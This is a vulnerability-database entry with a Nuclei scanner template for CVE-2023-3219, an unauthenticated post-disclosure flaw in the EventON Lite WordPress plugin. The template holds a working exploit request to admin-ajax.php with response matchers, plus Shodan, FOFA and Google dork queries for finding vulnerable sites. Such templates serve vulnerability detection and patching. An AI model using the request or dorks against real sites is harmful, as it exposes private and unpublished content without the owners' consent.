Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-3219
HistoryOct 17, 2023 - 7:20 a.m.

EventON Lite < 2.1.2 - Arbitrary File Download

2023-10-1707:20:28
ProjectDiscovery
github.com
12
cve
cve2023
wpscan
packetstorm
wordpress
wp-plugin
eventon-lite
bypass
myeventon

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

0.113 Low

EPSS

Percentile

95.2%

The plugin does not validate that the event_id parameter in its eventon_ics_download ajax action is a valid Event, allowing unauthenticated visitors
id: CVE-2023-3219

info:
  name: EventON Lite < 2.1.2 - Arbitrary File Download
  author: r3Y3r53
  severity: medium
  description: |
    The plugin does not validate that the event_id parameter in its eventon_ics_download ajax action is a valid Event, allowing unauthenticated visitors
    to access any Post (including unpublished or protected posts) content via the ics export functionality by providing the numeric id of the post.
  remediation: Fixed in version 2.1.2
  reference:
    - https://wpscan.com/vulnerability/72d80887-0270-4987-9739-95b1a178c1fd
    - https://nvd.nist.gov/vuln/detail/CVE-2023-3219
    - https://packetstormsecurity.com/files/173992/WordPress-EventON-Calendar-4.4-Insecure-Direct-Object-Reference.html
    - https://wordpress.org/plugins/eventon-lite/
    - http://packetstormsecurity.com/files/173992/WordPress-EventON-Calendar-4.4-Insecure-Direct-Object-Reference.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2023-3219
    cwe-id: CWE-639
    epss-score: 0.08542
    epss-percentile: 0.94439
    cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: myeventon
    product: eventon
    framework: wordpress
    shodan-query:
      - http.html:/wp-content/plugins/eventon/
      - http.html:/wp-content/plugins/eventon-lite/
    fofa-query:
      - wp-content/plugins/eventon/
      - body=/wp-content/plugins/eventon/
      - body=/wp-content/plugins/eventon-lite/
    publicwww-query:
      - "/wp-content/plugins/eventon-lite/"
      - /wp-content/plugins/eventon/
    google-query: inurl:"/wp-content/plugins/eventon/"
  tags: cve,cve2023,wpscan,packetstorm,wordpress,wp-plugin,wp,eventon-lite,bypass,myeventon

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=1"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "BEGIN:VCALENDAR"
          - "END:VCALENDAR"
        condition: and

      - type: word
        part: header
        words:
          - "text/Calendar"

      - type: status
        status:
          - 200
# digest: 490a0046304402201fd37b8f5b61f1b2b5e068d1d960779229bbe02aa80d3409b0df488b194dc59902207b86a8a61fe12433d239e9baeab759fda69bc1ca07f54f9a5c0e1c51ea8473d9:922c64590222798bb761d5b6d8e72950

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

0.113 Low

EPSS

Percentile

95.2%